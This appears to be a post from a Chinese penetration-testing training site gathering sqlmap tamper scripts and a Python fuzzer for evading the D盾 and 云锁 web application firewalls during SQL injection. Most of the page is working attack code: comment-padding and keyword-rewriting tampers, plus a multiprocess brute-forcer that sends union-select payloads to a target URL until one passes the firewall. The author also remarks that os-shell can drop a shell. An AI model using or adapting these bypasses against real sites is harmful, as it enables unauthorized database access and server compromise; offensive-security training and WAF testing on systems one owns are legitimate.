小迪渗透吧-提供最专业的渗透测试培训,web安全培训,网络安全培训,代码审计培训,安全服务培训,CTF比赛培训,SRC平台挖掘培训,红蓝对抗培训!
扫描关注小迪渗透吧-提供最专业的渗透测试培训,web安全培训,网络安全培训,代码审计培训,安全服务培训,CTF比赛培训,SRC平台挖掘培训,红蓝对抗培训!

微信扫一扫加我哦~

sqlmap tamper WAF整理版

小迪渗透吧-提供最专业的渗透测试培训,web安全培训,网络安全培训,代码审计培训,安全服务培训,CTF比赛培训,SRC平台挖掘培训,红蓝对抗培训!2020-03-12安全文档 2583 1A+A-

sqlmap tamper 速查梳理

image.png

sqlmap Bypass d盾 tamper

#!/usr/bin/env python
from lib.core.enums import PRIORITY
__priority__ = PRIORITY.LOW
def dependencies():
    pass
def tamper(payload, **kwargs):
    """
            BYPASS Ddun
    """
    retVal = payload
    if payload:                                                                               
        retVal = "" 
        quote, doublequote, firstspace = False, False, False
        for i in xrange(len(payload)):
            if not firstspace:
                if payload[i].isspace():
                    firstspace = True
                    retVal += "/*DJSAWW%2B%26Lt%3B%2B*/"
                    continue
            elif payload[i] == '\'':
                quote = not quote
            elif payload[i] == '"':
                doublequote = not doublequote
            elif payload[i] == " " and not doublequote and not quote:
                retVal += "/*DJSAWW%2B%26Lt%3B%2B*/"
                continue
            retVal += payload[i]
    return retVal
#@author:九世
#@time:2019/11/15
#@file:bypass.py
from gevent import monkey;monkey.patch_all()
from multiprocessing import Process
from colorama import init,Fore
import gevent
import requests
import time
import asyncio
import string
init(wrap=True)
class BypassDog(object):
    def __init__(self):
        self.data=string.digits+'!' #定义内容
        self.payload='http://192.168.241.158/sql.php?id=0%20union%20select%201,2'
        self.ybs=[]
        self.djcs=[]
        self.xcs=[]
        self.calc=0
        self.calc2=0
        self.calc3=0
        self.huan='  '
        self.dr=''
        self.r=''
    def reqts(self,da):
        jg=self.payload.replace('%20','/*{}*/'.format(da))
        try:
            rqt=requests.get(url=jg,headers={'user-agent':'Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/77.0.3865.120 Safari/537.36'})
            if not '网站防火墙' in rqt.text and not 'NULL' in rqt.text:
                print(Fore.GREEN+'[+] '+Fore.WHITE+' Bypass Dog url:{}'.format(jg))
                print(jg,file=open('test.txt','a',encoding='utf-8'))
                exit()
            else:
                print(Fore.RED+'[-] '+Fore.WHITE+' Bypass Dog fuck url:{}'.format(jg))
        except:
            pass
    def xc(self,rw):
        for g in rw:
            self.xcs.append(gevent.spawn(self.reqts,g))
        gevent.joinall(self.xcs)
        self.xcs.clear()
    def djc(self):
        for u in self.ybs:
            if self.calc==100:
                p=Process(target=self.xc,args=(self.djcs,))
                p.start()
                self.calc=0
                self.djcs.clear()
            time.sleep(0.01) #0.01 CPU低于50% 0.005CPU低于70 0.003CPU低于95,根据内容数量来手动设置是否需要延时
            self.djcs.append(u)
            self.calc+=1
        if len(self.djcs)>0:
            p = Process(target=self.xc, args=(self.djcs,))
            p.start()
            self.calc = 0
            self.djcs.clear()
    async def yb(self):
        for g in range(1,len(self.data)+1):
            while True:
                if self.calc3>g:
                    gd=self.dr+'    pod={};self.ybs.append(pod);self.calc2+=1\n{}' \
                               'if self.calc2==100:\n{}' \
                               '    self.djc()\n{}self.calc2=0\n{}self.ybs.clear()\n' \
                               'if len(self.ybs)>0:\n' \
                               '    self.djc();self.calc2=0;self.ybs.clear()'.format(self.r.rstrip('+'),self.huan+'   ',self.huan+'   ',self.huan+'   '+'    ',self.huan+'   '+'    ')
                    exec(gd)
                    self.calc3=0
                    self.huan=' '
                    self.dr=''
                    break
                else:
                    self.dr+="for s{} in self.data:\n{}".format(self.calc3,self.huan)
                    self.r+='s{}+'.format(self.calc3)
                    self.calc3+=1
                    self.huan+=' '
if __name__ == '__main__':
    obj=BypassDog()
    loop=asyncio.get_event_loop()
    tk=loop.create_task(obj.yb())
    loop.run_until_complete(tk)

sqlmap bypass 云锁tamper

只支持用union查询来过的,其他的测试语句会被云锁报警,这里问下大佬sqlmap能不能指定union来测试。。 这个os-shell也可以写出shell脚本,但是还后续执行命令会被云锁报警

#!/usr/bin/env python
"""
Copyright (c) 2006-2019 sqlmap developers (http://sqlmap.org/)
See the file 'LICENSE' for copying permission
"""
import re
from lib.core.data import kb
from lib.core.enums import PRIORITY
from lib.core.common import singleTimeWarnMessage
from lib.core.enums import DBMS
__priority__ = PRIORITY.LOW
def dependencies():
    pass
def tamper(payload, **kwargs):
         payload=payload.replace('ORDER','/*!00000order*/')
         payload=payload.replace('ALL SELECT','/*!00000all*/ /*!00000select')
         payload=payload.replace('CONCAT(',"CONCAT/**/(")
         payload=payload.replace("--"," */--")
         payload=payload.replace("AND","%26%26")
         return payload


文章关键词
注入
Bypass
手册
笔记
发表评论